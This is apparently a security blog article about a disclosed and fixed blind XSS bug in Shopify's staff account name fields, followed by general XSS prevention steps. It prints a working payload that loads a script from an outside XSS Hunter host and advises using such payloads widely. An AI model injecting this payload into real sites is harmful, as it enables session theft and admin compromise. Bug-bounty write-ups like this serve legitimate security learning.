asd
HomeBug BountyIndonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using...

Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter

What is Cross Site Scripting (XSS) ?

Cross Site Scripting (XSS) is a type of cyber attack where an attacker sneaks in harmful code into a web page that other users view. This can lead to the theft of important information like login details, and allow the attacker to carry out unauthorized activities on the targeted website. It’s kind of like a burglar sneaking into a house and planting a hidden camera, giving them access to all the personal information and activities of the homeowners. It’s a serious issue that can cause a lot of harm if not addressed.

 

The Story of Blind XSS Using XSS Hunter

In 2020, rioncool22, a bug hunter based in North Sumatera, Indonesia, submitted a report to Shopify about a potential vulnerability in their website. He was familiar with the site, as he had conducted multiple bug searches and submitted reports in the past, although with little success.

However, after reading a report about blind cross-site scripting (XSS) from Hacktivity, rioncool22 decided to try the same approach on Shopify’s site using XSS Hunter.

To his surprise, the payload was executed in the admin panel.

Rioncool22 reproduced the vulnerability by going to the “https://your-store.myshopify.com/admin/settings/account” page, adding a staff account, and filling in the first and last name fields with the xss hunter payload “><script>$.getScript(“//xsshunterdomain”)</script>”. The XSS was then fired in the admin panel.

 

Tips for XSS Vulnerability

Rioncool22 offered a helpful tip for other security researchers searching for XSS bugs:

“Tips: if you’re searching for XSS vulnerabilities, change your payload with the XSS Hunter payload, because you won’t know where the payload will be executed.”

Shopify responded to the report four days later and quickly triaged the issue. Within a week, the vulnerability was resolved and rioncool22 was rewarded with a monetary payout ($$$$). The public disclosure was made on August 19th 2020.

 

How to Prevent XSS Attack?

To prevent XSS attacks, follow these steps:

  1. Input validation: Implement strict input validation for all user-generated content, including form fields, search boxes, and message boards. This should include checks to ensure that user input only contains valid characters and is of the expected length.
  2. Output encoding: Encode all output that includes user-generated content to prevent it from being interpreted as code. This includes data displayed on web pages, as well as data stored in databases and passed between applications.
  3. Use secure coding practices: Ensure that all code follows secure coding practices, such as avoiding the use of eval(), avoiding inline event handlers, and using parameterized queries when accessing databases.
  4. Use security-focused browser extensions: Install security-focused browser extensions, such as NoScript, to block scripts from untrusted sources and prevent them from executing on your site.
  5. Keep software up to date: Keep all software up to date with the latest security patches and upgrades, including your web server software, content management system, and any third-party plugins or extensions.

By implementing these steps, you can help prevent XSS attacks and ensure the security of your website and user data.

 

 

Link to write up: here

Save the PDF here

Christin
Christinhttps://secry.me/explore
A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

seventeen + three =

Most Popular

GOOGLE ADVERTISEMENT

- Advertisement -